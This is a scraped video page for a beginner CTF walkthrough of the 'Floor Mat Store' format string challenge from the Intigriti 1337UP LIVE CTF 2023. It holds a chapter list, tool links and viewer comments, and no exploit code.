Format String Vulnerability - "Floor Mat Store" [INTIGRITI 1337UP LIVE CTF 2023]
Вставка
- Опубліковано 20 лип 2024
- Video walkthrough for "Floor Mat Store", a binary exploitation challenge I made for the @intigriti 1337UP LIVE CTF 2023. It was a fairly standard pwn challenge, requiring players to exploit a format string vulnerability (damn you printf *shakes fist at computer*). I tried to add some small twists and give it a theme to keep it interesting! Write-ups/tutorials aimed at beginners - Hope you enjoy 🙂 #INTIGRITI #CTF #Pwn #BinaryExploitation #BugBounty
↢Social Media↣
Twitter: / _cryptocat
GitHub: github.com/Crypto-Cat/CTF
HackTheBox: app.hackthebox.eu/profile/11897
LinkedIn: / cryptocat
Reddit: / _cryptocat23
UA-cam: / cryptocat23
Twitch: / cryptocat23
↢INTIGRITI 1337UPLIVE CTF↣
ctftime.org/event/2134
ctf.intigriti.io
go.intigriti.com/discord
↢Resources↣
Ghidra: ghidra-sre.org/CheatSheet.html
Volatility: github.com/volatilityfoundati...
PwnTools: github.com/Gallopsled/pwntool...
CyberChef: gchq.github.io/CyberChef
DCode: www.dcode.fr/en
HackTricks: book.hacktricks.xyz/pentestin...
CTF Tools: github.com/apsdehal/awesome-ctf
Forensics: cugu.github.io/awesome-forensics
Decompile Code: www.decompiler.com
Run Code: tio.run
↢Chapters↣
0:00 Start
0:50 Basic file checks
3:48 Explore functionality
4:57 Identify format string vulnerability
9:38 PwnTools script
12:48 Disassemble with Ghidra
15:05 Leak flag
16:34 Challenge source code
17:46 End - Наука та технологія
![Websocket SQLi and Weak JWT Signing Key - "Bug Report Repo" [INTIGRITI 1337UP LIVE CTF 2023]](http://i.ytimg.com/vi/kgndZOkgVxQ/mqdefault.jpg)
![Websocket SQLi and Weak JWT Signing Key - "Bug Report Repo" [INTIGRITI 1337UP LIVE CTF 2023]](/img/tr.png)
![Leaking Secret Data with a Heap Overflow - "Leek" Pwn Challenge [Angstrom CTF 2023]](http://i.ytimg.com/vi/55jibxjUj3I/mqdefault.jpg)
![Teleporting Through Walls with Cheat Engine - "No Way Out" [PicoCTF 2023]](http://i.ytimg.com/vi/QgF4PQjeG-o/mqdefault.jpg)
(/.\) the checksum protections are OBVI a hint not to try to force your way past them, who would’ve made an inference the other way? Couldn’t have been me….
But thank you for the video, Crypto! Will be adding a lot of the lessons learned to my notes for future growth
rule of thumb is:
- weak binary protections, lots of solves = probably buffer overflow
- strong binary protections, lots of solves = probably NOT buffer overflow
- strong binary protections, very little solves = i quit 😆
Such a great explanation man!
Binary exp is a bit hard, especially when you're getting int heap exp, got overrite, bypassing stack cookies...
It needs a good concentration and a good knowledge of the system architecture.
Keep up the good work Crypto!
@@oussamaboustani6873 Thanks! You're right, it's a super niche area and requires a lot of foundational knowledge, time and patience 🧠
Man i just found you and im so glad i did, keep it up. You got discord?
Yes bro! I moderate the intigriti discord @ go.intigriti.com, come join 🙂